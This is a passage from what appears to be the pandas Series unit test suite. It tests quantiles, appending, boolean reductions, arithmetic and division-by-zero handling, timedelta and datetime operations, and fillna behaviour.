result = func(ts)[1::2]\n expected = func(np.array(ts.valid()))\n\n self.assert_numpy_array_equal(result, expected)\n\n def test_round(self):\n # numpy.round doesn't preserve metadata, probably a numpy bug,\n # re: GH #314\n result = np.round(self.ts, 2)\n expected = Series(np.round(self.ts.values, 2), index=self.ts.index)\n assert_series_equal(result, expected)\n self.assertEqual(result.name, self.ts.name)\n\n def test_prod_numpy16_bug(self):\n s = Series([1., 1., 1.], index=lrange(3))\n result = s.prod()\n self.assertNotIsInstance(result, Series)\n\n def test_quantile(self):\n from numpy import percentile\n\n q = self.ts.quantile(0.1)\n self.assertEqual(q, percentile(self.ts.valid(), 10))\n\n q = self.ts.quantile(0.9)\n self.assertEqual(q, percentile(self.ts.valid(), 90))\n\n # object dtype\n q = Series(self.ts,dtype=object).quantile(0.9)\n self.assertEqual(q, percentile(self.ts.valid(), 90))\n\n # datetime64[ns] dtype\n dts = self.ts.index.to_series()\n q = dts.quantile(.2)\n self.assertEqual(q, Timestamp('2000-01-10 19:12:00'))\n\n # timedelta64[ns] dtype\n tds = dts.diff()\n q = tds.quantile(.25)\n self.assertEqual(q, pd.to_timedelta('24:00:00'))\n\n # GH7661\n result = Series([np.timedelta64('NaT')]).sum()\n self.assertTrue(result is pd.NaT)\n\n def test_quantile_multi(self):\n from numpy import percentile\n\n qs = [.1, .9]\n result = self.ts.quantile(qs)\n expected = pd.Series([percentile(self.ts.valid(), 10),\n percentile(self.ts.valid(), 90)],\n index=qs)\n assert_series_equal(result, expected)\n\n dts = 
self.ts.index.to_series()\n result = dts.quantile((.2, .2))\n assert_series_equal(result, Series([Timestamp('2000-01-10 19:12:00'),\n Timestamp('2000-01-10 19:12:00')],\n index=[.2, .2]))\n\n def test_append(self):\n appendedSeries = self.series.append(self.objSeries)\n for idx, value in compat.iteritems(appendedSeries):\n if idx in self.series.index:\n self.assertEqual(value, self.series[idx])\n elif idx in self.objSeries.index:\n self.assertEqual(value, self.objSeries[idx])\n else:\n self.fail(\"orphaned index!\")\n\n self.assertRaises(ValueError, self.ts.append, self.ts,\n verify_integrity=True)\n\n def test_append_many(self):\n pieces = [self.ts[:5], self.ts[5:10], self.ts[10:]]\n\n result = pieces[0].append(pieces[1:])\n assert_series_equal(result, self.ts)\n\n def test_all_any(self):\n ts = tm.makeTimeSeries()\n bool_series = ts > 0\n self.assertFalse(bool_series.all())\n self.assertTrue(bool_series.any())\n\n # Alternative types, with implicit 'object' dtype.\n s = Series(['abc', True])\n self.assertEqual('abc', s.any()) # 'abc' || True => 'abc'\n\n def test_all_any_params(self):\n # Check skipna, with implicit 'object' dtype.\n s1 = Series([np.nan, True])\n s2 = Series([np.nan, False])\n self.assertTrue(s1.all(skipna=False)) # nan && True => True\n self.assertTrue(s1.all(skipna=True))\n self.assertTrue(np.isnan(s2.any(skipna=False))) # nan || False => nan\n self.assertFalse(s2.any(skipna=True))\n\n # Check level.\n s = pd.Series([False, False, True, True, False, True],\n index=[0, 0, 1, 1, 2, 2])\n assert_series_equal(s.all(level=0), Series([False, True, False]))\n assert_series_equal(s.any(level=0), Series([False, True, True]))\n\n # bool_only is not implemented with level option.\n self.assertRaises(NotImplementedError, s.any, bool_only=True, level=0)\n self.assertRaises(NotImplementedError, s.all, bool_only=True, level=0)\n\n # bool_only is not implemented alone.\n self.assertRaises(NotImplementedError, s.any, bool_only=True)\n self.assertRaises(NotImplementedError, s.all, bool_only=True)\n\n def test_op_method(self):\n def check(series, other, check_reverse=False):\n simple_ops = ['add', 'sub', 'mul', 'floordiv', 'truediv', 'pow']\n if not compat.PY3:\n simple_ops.append('div')\n\n for opname in simple_ops:\n op = getattr(Series, opname)\n\n if op == 'div':\n alt = operator.truediv\n else:\n alt = getattr(operator, opname)\n\n result = op(series, other)\n expected = alt(series, other)\n tm.assert_almost_equal(result, expected)\n if check_reverse:\n rop = getattr(Series, \"r\" + opname)\n result = rop(series, other)\n expected = alt(other, series)\n tm.assert_almost_equal(result, expected)\n\n check(self.ts, self.ts * 2)\n check(self.ts, self.ts[::2])\n check(self.ts, 5, check_reverse=True)\n check(tm.makeFloatSeries(), tm.makeFloatSeries(), check_reverse=True)\n\n def test_neg(self):\n assert_series_equal(-self.series, -1 * self.series)\n\n def test_invert(self):\n assert_series_equal(-(self.series < 0), ~(self.series < 0))\n\n def test_modulo(self):\n\n # GH3590, modulo as ints\n p = DataFrame({'first': [3, 4, 5, 8], 'second': [0, 0, 0, 3]})\n result = p['first'] % p['second']\n expected = Series(p['first'].values %\n p['second'].values, dtype='float64')\n expected.iloc[0:3] = np.nan\n assert_series_equal(result, expected)\n\n result = p['first'] % 0\n expected = Series(np.nan, index=p.index)\n assert_series_equal(result, expected)\n\n p = p.astype('float64')\n result = p['first'] % p['second']\n expected = Series(p['first'].values % p['second'].values)\n 
assert_series_equal(result, expected)\n\n p = p.astype('float64')\n result = p['first'] % p['second']\n result2 = p['second'] % p['first']\n self.assertFalse(np.array_equal(result, result2))\n\n # GH 9144\n s = Series([0, 1])\n\n result = s % 0\n expected = Series([nan, nan])\n assert_series_equal(result, expected)\n\n result = 0 % s\n expected = Series([nan, 0.0])\n assert_series_equal(result, expected)\n\n def test_div(self):\n\n # no longer do integer div for any ops, but deal with the 0's\n p = DataFrame({'first': [3, 4, 5, 8], 'second': [0, 0, 0, 3]})\n result = p['first'] / p['second']\n expected = Series(\n p['first'].values.astype(float) / p['second'].values, dtype='float64')\n expected.iloc[0:3] = np.inf\n assert_series_equal(result, expected)\n\n result = p['first'] / 0\n expected = Series(np.inf, index=p.index)\n assert_series_equal(result, expected)\n\n p = p.astype('float64')\n result = p['first'] / p['second']\n expected = Series(p['first'].values / p['second'].values)\n assert_series_equal(result, expected)\n\n p = DataFrame({'first': [3, 4, 5, 8], 'second': [1, 1, 1, 1]})\n result = p['first'] / p['second']\n assert_series_equal(result, p['first'].astype('float64'))\n self.assertFalse(np.array_equal(result, p['second'] / p['first']))\n\n # inf signing\n s = Series([np.nan,1.,-1.])\n result = s / 0\n expected = Series([np.nan,np.inf,-np.inf])\n assert_series_equal(result, expected)\n\n # float/integer issue\n # GH 7785\n p = DataFrame({'first': (1,0), 'second': (-0.01,-0.02)})\n expected = Series([-0.01,-np.inf])\n\n result = p['second'].div(p['first'])\n assert_series_equal(result, expected)\n\n result = p['second'] / p['first']\n assert_series_equal(result, expected)\n\n # GH 9144\n s = Series([-1, 0, 1])\n\n result = 0 / s\n expected = Series([0.0, nan, 0.0])\n assert_series_equal(result, expected)\n\n result = s / 0\n expected = Series([-inf, nan, inf])\n assert_series_equal(result, expected)\n\n result = s // 0\n expected = Series([-inf, nan, inf])\n assert_series_equal(result, expected)\n\n def test_operators(self):\n\n def _check_op(series, other, op, pos_only=False):\n left = np.abs(series) if pos_only else series\n right = np.abs(other) if pos_only else other\n\n cython_or_numpy = op(left, right)\n python = left.combine(right, op)\n tm.assert_almost_equal(cython_or_numpy, python)\n\n def check(series, other):\n simple_ops = ['add', 'sub', 'mul', 'truediv', 'floordiv', 'mod']\n\n for opname in simple_ops:\n _check_op(series, other, getattr(operator, opname))\n\n _check_op(series, other, operator.pow, pos_only=True)\n\n _check_op(series, other, lambda x, y: operator.add(y, x))\n _check_op(series, other, lambda x, y: operator.sub(y, x))\n _check_op(series, other, lambda x, y: operator.truediv(y, x))\n _check_op(series, other, lambda x, y: operator.floordiv(y, x))\n _check_op(series, other, lambda x, y: operator.mul(y, x))\n _check_op(series, other, lambda x, y: operator.pow(y, x),\n pos_only=True)\n _check_op(series, other, lambda x, y: operator.mod(y, x))\n\n check(self.ts, self.ts * 2)\n check(self.ts, self.ts * 0)\n check(self.ts, self.ts[::2])\n check(self.ts, 5)\n\n def check_comparators(series, other):\n _check_op(series, other, operator.gt)\n _check_op(series, other, operator.ge)\n _check_op(series, other, operator.eq)\n _check_op(series, other, operator.lt)\n _check_op(series, other, operator.le)\n\n check_comparators(self.ts, 5)\n check_comparators(self.ts, self.ts + 1)\n\n def test_operators_empty_int_corner(self):\n s1 = Series([], [], dtype=np.int32)\n s2 = 
Series({'x': 0.})\n tm.assert_series_equal(s1 * s2, Series([np.nan], index=['x']))\n\n def test_constructor_dtype_timedelta64(self):\n\n # basic\n td = Series([timedelta(days=i) for i in range(3)])\n self.assertEqual(td.dtype, 'timedelta64[ns]')\n\n td = Series([timedelta(days=1)])\n self.assertEqual(td.dtype, 'timedelta64[ns]')\n\n td = Series([timedelta(days=1),timedelta(days=2),np.timedelta64(1,'s')])\n self.assertEqual(td.dtype, 'timedelta64[ns]')\n\n # mixed with NaT\n from pandas import tslib\n td = Series([timedelta(days=1),tslib.NaT ], dtype='m8[ns]' )\n self.assertEqual(td.dtype, 'timedelta64[ns]')\n\n td = Series([timedelta(days=1),np.nan ], dtype='m8[ns]' )\n self.assertEqual(td.dtype, 'timedelta64[ns]')\n\n td = Series([np.timedelta64(300000000), pd.NaT],dtype='m8[ns]')\n self.assertEqual(td.dtype, 'timedelta64[ns]')\n\n # improved inference\n # GH5689\n td = Series([np.timedelta64(300000000), pd.NaT])\n self.assertEqual(td.dtype, 'timedelta64[ns]')\n\n td = Series([np.timedelta64(300000000), tslib.iNaT])\n self.assertEqual(td.dtype, 'timedelta64[ns]')\n\n td = Series([np.timedelta64(300000000), np.nan])\n self.assertEqual(td.dtype, 'timedelta64[ns]')\n\n td = Series([pd.NaT, np.timedelta64(300000000)])\n self.assertEqual(td.dtype, 'timedelta64[ns]')\n\n td = Series([np.timedelta64(1,'s')])\n self.assertEqual(td.dtype, 'timedelta64[ns]')\n\n # these are frequency conversion astypes\n #for t in ['s', 'D', 'us', 'ms']:\n # self.assertRaises(TypeError, td.astype, 'm8[%s]' % t)\n\n # valid astype\n td.astype('int64')\n\n # invalid casting\n self.assertRaises(TypeError, td.astype, 'int32')\n\n # this is an invalid casting\n def f():\n Series([timedelta(days=1), 'foo'],dtype='m8[ns]')\n self.assertRaises(Exception, f)\n\n # leave as object here\n td = Series([timedelta(days=i) for i in range(3)] + ['foo'])\n self.assertEqual(td.dtype, 'object')\n\n # these will correctly infer a timedelta\n s = Series([None, pd.NaT, '1 Day'])\n self.assertEqual(s.dtype,'timedelta64[ns]')\n s = Series([np.nan, pd.NaT, '1 Day'])\n self.assertEqual(s.dtype,'timedelta64[ns]')\n s = Series([pd.NaT, None, '1 Day'])\n self.assertEqual(s.dtype,'timedelta64[ns]')\n s = Series([pd.NaT, np.nan, '1 Day'])\n self.assertEqual(s.dtype,'timedelta64[ns]')\n\n def test_operators_timedelta64(self):\n\n # invalid ops\n self.assertRaises(Exception, self.objSeries.__add__, 1)\n self.assertRaises(\n Exception, self.objSeries.__add__, np.array(1, dtype=np.int64))\n self.assertRaises(Exception, self.objSeries.__sub__, 1)\n self.assertRaises(\n Exception, self.objSeries.__sub__, np.array(1, dtype=np.int64))\n\n # seriese ops\n v1 = date_range('2012-1-1', periods=3, freq='D')\n v2 = date_range('2012-1-2', periods=3, freq='D')\n rs = Series(v2) - Series(v1)\n xp = Series(1e9 * 3600 * 24, rs.index).astype(\n 'int64').astype('timedelta64[ns]')\n assert_series_equal(rs, xp)\n self.assertEqual(rs.dtype, 'timedelta64[ns]')\n\n df = DataFrame(dict(A=v1))\n td = Series([timedelta(days=i) for i in range(3)])\n self.assertEqual(td.dtype, 'timedelta64[ns]')\n\n # series on the rhs\n result = df['A'] - df['A'].shift()\n self.assertEqual(result.dtype, 'timedelta64[ns]')\n\n result = df['A'] + td\n self.assertEqual(result.dtype, 'M8[ns]')\n\n # scalar Timestamp on rhs\n maxa = df['A'].max()\n tm.assert_isinstance(maxa, Timestamp)\n\n resultb = df['A'] - df['A'].max()\n self.assertEqual(resultb.dtype, 'timedelta64[ns]')\n\n # timestamp on lhs\n result = resultb + df['A']\n expected = Series(\n [Timestamp('20111230'), Timestamp('20120101'), 
Timestamp('20120103')])\n assert_series_equal(result, expected)\n\n # datetimes on rhs\n result = df['A'] - datetime(2001, 1, 1)\n expected = Series([timedelta(days=4017 + i) for i in range(3)])\n assert_series_equal(result, expected)\n self.assertEqual(result.dtype, 'm8[ns]')\n\n d = datetime(2001, 1, 1, 3, 4)\n resulta = df['A'] - d\n self.assertEqual(resulta.dtype, 'm8[ns]')\n\n # roundtrip\n resultb = resulta + d\n assert_series_equal(df['A'], resultb)\n\n # timedeltas on rhs\n td = timedelta(days=1)\n resulta = df['A'] + td\n resultb = resulta - td\n assert_series_equal(resultb, df['A'])\n self.assertEqual(resultb.dtype, 'M8[ns]')\n\n # roundtrip\n td = timedelta(minutes=5, seconds=3)\n resulta = df['A'] + td\n resultb = resulta - td\n assert_series_equal(df['A'], resultb)\n self.assertEqual(resultb.dtype, 'M8[ns]')\n\n # inplace\n value = rs[2] + np.timedelta64(timedelta(minutes=5,seconds=1))\n rs[2] += np.timedelta64(timedelta(minutes=5,seconds=1))\n self.assertEqual(rs[2], value)\n\n def test_timedeltas_with_DateOffset(self):\n\n # GH 4532\n # operate with pd.offsets\n s = Series([Timestamp('20130101 9:01'), Timestamp('20130101 9:02')])\n\n result = s + pd.offsets.Second(5)\n result2 = pd.offsets.Second(5) + s\n expected = Series(\n [Timestamp('20130101 9:01:05'), Timestamp('20130101 9:02:05')])\n assert_series_equal(result, expected)\n assert_series_equal(result2, expected)\n\n result = s + pd.offsets.Milli(5)\n result2 = pd.offsets.Milli(5) + s\n expected = Series(\n [Timestamp('20130101 9:01:00.005'), Timestamp('20130101 9:02:00.005')])\n assert_series_equal(result, expected)\n assert_series_equal(result2, expected)\n\n result = s + pd.offsets.Minute(5) + pd.offsets.Milli(5)\n expected = Series(\n [Timestamp('20130101 9:06:00.005'), Timestamp('20130101 9:07:00.005')])\n assert_series_equal(result, expected)\n\n # operate with np.timedelta64 correctly\n result = s + np.timedelta64(1, 's')\n result2 = np.timedelta64(1, 's') + s\n expected = Series(\n [Timestamp('20130101 9:01:01'), Timestamp('20130101 9:02:01')])\n assert_series_equal(result, expected)\n assert_series_equal(result2, expected)\n\n result = s + np.timedelta64(5, 'ms')\n result2 = np.timedelta64(5, 'ms') + s\n expected = Series(\n [Timestamp('20130101 9:01:00.005'), Timestamp('20130101 9:02:00.005')])\n assert_series_equal(result, expected)\n assert_series_equal(result2, expected)\n\n # valid DateOffsets\n for do in [ 'Hour', 'Minute', 'Second', 'Day', 'Micro',\n 'Milli', 'Nano' ]:\n op = getattr(pd.offsets,do)\n s + op(5)\n op(5) + s\n\n # invalid DateOffsets\n for do in [ 'Week', 'BDay', 'BQuarterEnd', 'BMonthEnd', 'BYearEnd',\n 'BYearBegin','BQuarterBegin', 'BMonthBegin',\n 'MonthEnd','YearBegin', 'YearEnd',\n 'MonthBegin', 'QuarterBegin' ]:\n op = getattr(pd.offsets,do)\n self.assertRaises(TypeError, s.__add__, op(5))\n self.assertRaises(TypeError, s.__radd__, op(5))\n\n def test_timedelta64_operations_with_timedeltas(self):\n\n # td operate with td\n td1 = Series([timedelta(minutes=5, seconds=3)] * 3)\n td2 = timedelta(minutes=5, seconds=4)\n result = td1 - td2\n expected = Series([timedelta(seconds=0)] * 3) -Series(\n [timedelta(seconds=1)] * 3)\n self.assertEqual(result.dtype, 'm8[ns]')\n assert_series_equal(result, expected)\n\n result2 = td2 - td1\n expected = (Series([timedelta(seconds=1)] * 3) -\n Series([timedelta(seconds=0)] * 3))\n assert_series_equal(result2, expected)\n\n # roundtrip\n assert_series_equal(result + td2,td1)\n\n # Now again, using pd.to_timedelta, which should build\n # a Series or a 
scalar, depending on input.\n td1 = Series(pd.to_timedelta(['00:05:03'] * 3))\n td2 = pd.to_timedelta('00:05:04')\n result = td1 - td2\n expected = Series([timedelta(seconds=0)] * 3) -Series(\n [timedelta(seconds=1)] * 3)\n self.assertEqual(result.dtype, 'm8[ns]')\n assert_series_equal(result, expected)\n\n result2 = td2 - td1\n expected = (Series([timedelta(seconds=1)] * 3) -\n Series([timedelta(seconds=0)] * 3))\n assert_series_equal(result2, expected)\n\n # roundtrip\n assert_series_equal(result + td2,td1)\n\n def test_timedelta64_operations_with_integers(self):\n\n # GH 4521\n # divide/multiply by integers\n startdate = Series(date_range('2013-01-01', '2013-01-03'))\n enddate = Series(date_range('2013-03-01', '2013-03-03'))\n\n s1 = enddate - startdate\n s1[2] = np.nan\n s2 = Series([2, 3, 4])\n expected = Series(s1.values.astype(np.int64) / s2, dtype='m8[ns]')\n expected[2] = np.nan\n result = s1 / s2\n assert_series_equal(result,expected)\n\n s2 = Series([20, 30, 40])\n expected = Series(s1.values.astype(np.int64) / s2, dtype='m8[ns]')\n expected[2] = np.nan\n result = s1 / s2\n assert_series_equal(result,expected)\n\n result = s1 / 2\n expected = Series(s1.values.astype(np.int64) / 2, dtype='m8[ns]')\n expected[2] = np.nan\n assert_series_equal(result,expected)\n\n s2 = Series([20, 30, 40])\n expected = Series(s1.values.astype(np.int64) * s2, dtype='m8[ns]')\n expected[2] = np.nan\n result = s1 * s2\n assert_series_equal(result,expected)\n\n for dtype in ['int32','int16','uint32','uint64','uint32','uint16','uint8']:\n s2 = Series([20, 30, 40],dtype=dtype)\n expected = Series(s1.values.astype(np.int64) * s2.astype(np.int64), dtype='m8[ns]')\n expected[2] = np.nan\n result = s1 * s2\n assert_series_equal(result,expected)\n\n result = s1 * 2\n expected = Series(s1.values.astype(np.int64) * 2, dtype='m8[ns]')\n expected[2] = np.nan\n assert_series_equal(result,expected)\n\n result = s1 * -1\n expected = Series(s1.values.astype(np.int64) * -1, dtype='m8[ns]')\n expected[2] = np.nan\n assert_series_equal(result,expected)\n\n # invalid ops\n for op in ['__true_div__','__div__','__mul__']:\n sop = getattr(s1,op,None)\n if sop is not None:\n self.assertRaises(TypeError, sop, s2.astype(float))\n self.assertRaises(TypeError, sop, 2.)\n\n for op in ['__add__','__sub__']:\n sop = getattr(s1,op,None)\n if sop is not None:\n self.assertRaises(TypeError, sop, 1)\n self.assertRaises(TypeError, sop, s2.values)\n\n def test_timedelta64_conversions(self):\n startdate = Series(date_range('2013-01-01', '2013-01-03'))\n enddate = Series(date_range('2013-03-01', '2013-03-03'))\n\n s1 = enddate - startdate\n s1[2] = np.nan\n\n for m in [1, 3, 10]:\n for unit in ['D','h','m','s','ms','us','ns']:\n\n # op\n expected = s1.apply(lambda x: x / np.timedelta64(m,unit))\n result = s1 / np.timedelta64(m,unit)\n assert_series_equal(result, expected)\n\n if m == 1 and unit != 'ns':\n\n # astype\n result = s1.astype(\"timedelta64[{0}]\".format(unit))\n assert_series_equal(result, expected)\n\n # reverse op\n expected = s1.apply(lambda x: np.timedelta64(m,unit) / x)\n result = np.timedelta64(m,unit) / s1\n\n # astype\n s = Series(date_range('20130101',periods=3))\n result = s.astype(object)\n self.assertIsInstance(result.iloc[0],datetime)\n self.assertTrue(result.dtype == np.object_)\n\n result = s1.astype(object)\n self.assertIsInstance(result.iloc[0],timedelta)\n self.assertTrue(result.dtype == np.object_)\n\n def test_timedelta64_equal_timedelta_supported_ops(self):\n ser = Series([Timestamp('20130301'), 
Timestamp('20130228 23:00:00'),\n Timestamp('20130228 22:00:00'),\n Timestamp('20130228 21:00:00')])\n\n intervals = 'D', 'h', 'm', 's', 'us'\n npy16_mappings = {'D': 24 * 60 * 60 * 1000000, 'h': 60 * 60 * 1000000,\n 'm': 60 * 1000000, 's': 1000000, 'us': 1}\n\n def timedelta64(*args):\n return sum(starmap(np.timedelta64, zip(args, intervals)))\n\n for op, d, h, m, s, us in product([operator.add, operator.sub],\n *([range(2)] * 5)):\n nptd = timedelta64(d, h, m, s, us)\n pytd = timedelta(days=d, hours=h, minutes=m, seconds=s,\n microseconds=us)\n lhs = op(ser, nptd)\n rhs = op(ser, pytd)\n\n try:\n assert_series_equal(lhs, rhs)\n except:\n raise AssertionError(\n \"invalid comparsion [op->{0},d->{1},h->{2},m->{3},s->{4},us->{5}]\\n{6}\\n{7}\\n\".format(op, d, h, m, s, us, lhs, rhs))\n\n def test_timedelta_assignment(self):\n # GH 8209\n s = Series([])\n s.loc['B'] = timedelta(1)\n tm.assert_series_equal(s,Series(Timedelta('1 days'),index=['B']))\n\n s = s.reindex(s.index.insert(0, 'A'))\n tm.assert_series_equal(s,Series([np.nan,Timedelta('1 days')],index=['A','B']))\n\n result = s.fillna(timedelta(1))\n expected = Series(Timedelta('1 days'),index=['A','B'])\n tm.assert_series_equal(result, expected)\n\n s.loc['A'] = timedelta(1)\n tm.assert_series_equal(s, expected)\n\n def test_operators_datetimelike(self):\n\n def run_ops(ops, get_ser, test_ser):\n for op in ops:\n try:\n op = getattr(get_ser, op, None)\n if op is not None:\n self.assertRaises(TypeError, op, test_ser)\n except:\n com.pprint_thing(\"Failed on op %r\" % op)\n raise\n ### timedelta64 ###\n td1 = Series([timedelta(minutes=5,seconds=3)]*3)\n td2 = timedelta(minutes=5,seconds=4)\n ops = ['__mul__','__floordiv__','__pow__',\n '__rmul__','__rfloordiv__','__rpow__']\n run_ops(ops, td1, td2)\n td1 + td2\n td2 + td1\n td1 - td2\n td2 - td1\n td1 / td2\n td2 / td1\n\n ### datetime64 ###\n dt1 = Series([Timestamp('20111230'), Timestamp('20120101'),\n Timestamp('20120103')])\n dt2 = Series([Timestamp('20111231'), Timestamp('20120102'),\n Timestamp('20120104')])\n ops = ['__add__', '__mul__', '__floordiv__', '__truediv__', '__div__',\n '__pow__', '__radd__', '__rmul__', '__rfloordiv__',\n '__rtruediv__', '__rdiv__', '__rpow__']\n run_ops(ops, dt1, dt2)\n dt1 - dt2\n dt2 - dt1\n\n ### datetime64 with timetimedelta ###\n ops = ['__mul__', '__floordiv__', '__truediv__', '__div__', '__pow__',\n '__rmul__', '__rfloordiv__', '__rtruediv__', '__rdiv__',\n '__rpow__']\n run_ops(ops, dt1, td1)\n dt1 + td1\n td1 + dt1\n dt1 - td1\n # TODO: Decide if this ought to work.\n # td1 - dt1\n\n ### timetimedelta with datetime64 ###\n ops = ['__sub__', '__mul__', '__floordiv__', '__truediv__', '__div__',\n '__pow__', '__rsub__', '__rmul__', '__rfloordiv__',\n '__rtruediv__', '__rdiv__', '__rpow__']\n run_ops(ops, td1, dt1)\n td1 + dt1\n dt1 + td1\n\n def test_ops_datetimelike_align(self):\n # GH 7500\n # datetimelike ops need to align\n dt = Series(date_range('2012-1-1', periods=3, freq='D'))\n dt.iloc[2] = np.nan\n dt2 = dt[::-1]\n\n expected = Series([timedelta(0),timedelta(0),pd.NaT])\n\n result = dt2-dt\n assert_series_equal(result,expected)\n\n result = (dt2.to_frame()-dt.to_frame())[0]\n assert_series_equal(result,expected)\n\n def test_timedelta64_functions(self):\n\n from datetime import timedelta\n from pandas import date_range\n\n # index min/max\n td = Series(date_range('2012-1-1', periods=3, freq='D')) - \\\n Timestamp('20120101')\n\n result = td.idxmin()\n self.assertEqual(result, 0)\n\n result = td.idxmax()\n self.assertEqual(result, 2)\n\n 
# GH 2982\n # with NaT\n td[0] = np.nan\n\n result = td.idxmin()\n self.assertEqual(result, 1)\n\n result = td.idxmax()\n self.assertEqual(result, 2)\n\n # abs\n s1 = Series(date_range('20120101', periods=3))\n s2 = Series(date_range('20120102', periods=3))\n expected = Series(s2 - s1)\n\n # this fails as numpy returns timedelta64[us]\n #result = np.abs(s1-s2)\n # assert_frame_equal(result,expected)\n\n result = (s1 - s2).abs()\n assert_series_equal(result, expected)\n\n # max/min\n result = td.max()\n expected = Timedelta('2 days')\n self.assertEqual(result, expected)\n\n result = td.min()\n expected = Timedelta('1 days')\n self.assertEqual(result, expected)\n\n def test_ops_consistency_on_empty(self):\n\n # GH 7869\n # consistency on empty\n\n # float\n result = Series(dtype=float).sum()\n self.assertEqual(result,0)\n\n result = Series(dtype=float).mean()\n self.assertTrue(isnull(result))\n\n result = Series(dtype=float).median()\n self.assertTrue(isnull(result))\n\n # timedelta64[ns]\n result = Series(dtype='m8[ns]').sum()\n self.assertEqual(result, Timedelta(0))\n\n result = Series(dtype='m8[ns]').mean()\n self.assertTrue(result is pd.NaT)\n\n result = Series(dtype='m8[ns]').median()\n self.assertTrue(result is pd.NaT)\n\n def test_timedelta_fillna(self):\n #GH 3371\n s = Series([Timestamp('20130101'), Timestamp('20130101'),\n Timestamp('20130102'), Timestamp('20130103 9:01:01')])\n td = s.diff()\n\n # reg fillna\n result = td.fillna(0)\n expected = Series([timedelta(0), timedelta(0), timedelta(1),\n timedelta(days=1, seconds=9*3600+60+1)])\n assert_series_equal(result, expected)\n\n # interprested as seconds\n result = td.fillna(1)\n expected = Series([timedelta(seconds=1), timedelta(0),\n timedelta(1), timedelta(days=1, seconds=9*3600+60+1)])\n assert_series_equal(result, expected)\n\n result = td.fillna(timedelta(days=1, seconds=1))\n expected = Series([timedelta(days=1, seconds=1), timedelta(0),\n timedelta(1), timedelta(days=1, seconds=9*3600+60+1)])\n assert_series_equal(result, expected)\n\n result = td.fillna(np.timedelta64(int(1e9)))\n expected = Series([timedelta(seconds=1), timedelta(0), timedelta(1),\n timedelta(days=1, seconds=9*3600+60+1)])\n assert_series_equal(result, expected)\n\n from pandas import tslib\n result = td.fillna(tslib.NaT)\n expected = Series([tslib.NaT, timedelta(0), timedelta(1),\n timedelta(days=1, seconds=9*3600+60+1)], dtype='m8[ns]')\n assert_series_equal(result, expected)\n\n # ffill\n td[2] = np.nan\n result = td.ffill()\n expected = td.fillna(0)\n expected[0] = np.nan\n assert_series_equal(result, expected)\n\n # bfill\n td[2] = np.nan\n result = td.bfill()\n expected = td.fillna(0)\n expected[2] = timedelta(days=1, seconds=9*3600+60+1)\n assert_series_equal(result, expected)\n\n def test_datetime64_fillna(self):\n\n s = Series([Timestamp('20130101'), Timestamp('20130101'),\n Timestamp('20130102'), Timestamp('20130103 9:01:01')])\n s[2] = np.nan\n\n # reg fillna\n result = s.fillna(Timestamp('20130104'))\n expected = Series([Timestamp('20130101'), Timestamp('20130101'),\n Timestamp('20130104'), Timestamp('20130103 9:01:01')])\n assert_series_equal(result, expected)\n\n from pandas import tslib\n result = s.fillna(tslib.NaT)\n expected = s\n assert_series_equal(result, expected)\n\n # ffill\n result = s.ffill()\n expected = Series([Timestamp('20130101'), Timestamp('20130101'),\n Timestamp('20130101'), Timestamp('20130103 9:01:01')])\n assert_series_equal(result, expected)\n\n # bfill\n result = s.bfill()\n expected = Series([Timestamp('20130101'), 
Timestamp('20130101'),\n Timestamp('20130103 9:01:01'),\n Timestamp('20130103 9:01:01')])\n assert_series_equal(result, expected)\n\n # GH 6587\n # make sure that we are treating as integer when filling\n # this also tests inference of a datetime-like with NaT's\n s = Series([pd.NaT, pd.NaT, '2013-08-05 15:30:00.000001'])\n expected = Series(['2013-08-05 15:30:00.000001', '2013-08-05 15:30:00.000001', '2013-08-05 15:30:00.000001'], dtype='M8[ns]')\n result = s.fillna(method='backfill')\n assert_series_equal(result, expected)\n\n def test_fillna_int(self):\n s = Series(np.random.randint(-100, 100, 50))\n s.fillna(method='ffill', inplace=True)\n assert_series_equal(s.fillna(method='ffill', inplace=False), s)\n\n def test_fillna_raise(self):\n s = Series(np.random.randint(-100, 100, 50))\n self.assertRaises(TypeError, s.fillna, [1, 2])\n self.assertRaises(TypeError, s.fillna, (1, 2))\n\n def test_raise_on_info(self):\n s = Series(np.random.randn(10))\n with tm.assertRaises(AttributeError):\n s.info()\n\n def test_isnull_for_inf(self):\n s = Series(['a', np.inf, np.nan, 1.0])\n with pd.option_context('mode.use_inf_as_null', True):\n r = s.isnull()\n dr = s.dropna()\n e = Series([False, True, True, False])\n de = Series(['a', 1.0], index=[0, 3])\n tm.assert_series_equal(r, e)\n tm.assert_series_equal(dr, de)\n\n\n# TimeSeries-specific\n\n def test_fillna(self):\n ts = Series([0., 1., 2., 3., 4.], index=tm.makeDateIndex(5))\n\n self.assert_numpy_array_equal(ts, ts.fillna(method='ffill'))\n\n ts[2] = np.NaN\n\n self.assert_numpy_array_equal(ts.fillna(method='ffill'),\n [0., 1., 1., 3., 4.])\n self.assert_numpy_array_equal(ts.fillna(method='backfill'),\n [0., 1., 3., 3., 4.])\n\n self.assert_numpy_array_equal(ts.fillna(value=5), [0., 1., 5., 3., 4.])\n\n self.assertRaises(ValueError, ts.fillna)\n self.assertRaises(ValueError, self.ts.fillna, value=0, method='ffill')\n\n # GH 5703\n s1 = Series([np.nan])\n s2 = Series([1])\n result = s1.fillna(s2)\n expected = Series([1.])\n assert_series_equal(result,expected)\n result = s1.fillna({})\n assert_series_equal(result,s1)\n result = s1.fillna(Series(()))\n assert_series_equal(result,s1)\n result = s2.fillna(s1)\n assert_series_equal(result,s2)\n result = s1.fillna({ 0 : 1})\n assert_series_equal(result,expected)\n result = s1.fillna({ 1 : 1})\n assert_series_equal(result,Series([np.nan]))\n result = s1.fillna({ 0 : 1, 1 : 1})\n assert_series_equal(result,expected)\n result = s1.fillna(Series({ 0 : 1, 1 : 1}))\n assert_series_equal(result,expected)\n result = s1.fillna(Series({ 0 : 1, 1 : 1},index=[4,5]))\n assert_series_equal(result,s1)\n\n s1 = Series([0, 1, 2], list('abc'))\n s2 = Series([0, np.nan, 2], list('bac'))\n result = s2.fillna(s1)\n expected = Series([0,0,2.], list('bac'))\n assert_series_equal(result,expected)\n\n # limit\n s = Series(np.nan,index=[0,1,2])\n result = s.fillna(999,limit=1)\n expected = Series([999,np.nan,np.nan],index=[0,1,2])\n assert_series_equal(result,expected)\n\n result = s.fillna(999,limit=2)\n expected = Series([999,999,np.nan],index=[0,1,2])\n assert_series_equal(result,expected)\n\n def test_fillna_bug(self):\n x = Series([nan, 1., nan, 3., nan], ['z', 'a', 'b', 'c', 'd'])\n filled = x.fillna(method='ffill')\n expected = Series([nan, 1., 1., 3., 3.], x.index)\n assert_series_equal(filled, expected)\n\n filled = x.fillna(method='bfill')\n expected = Series([1., 1., 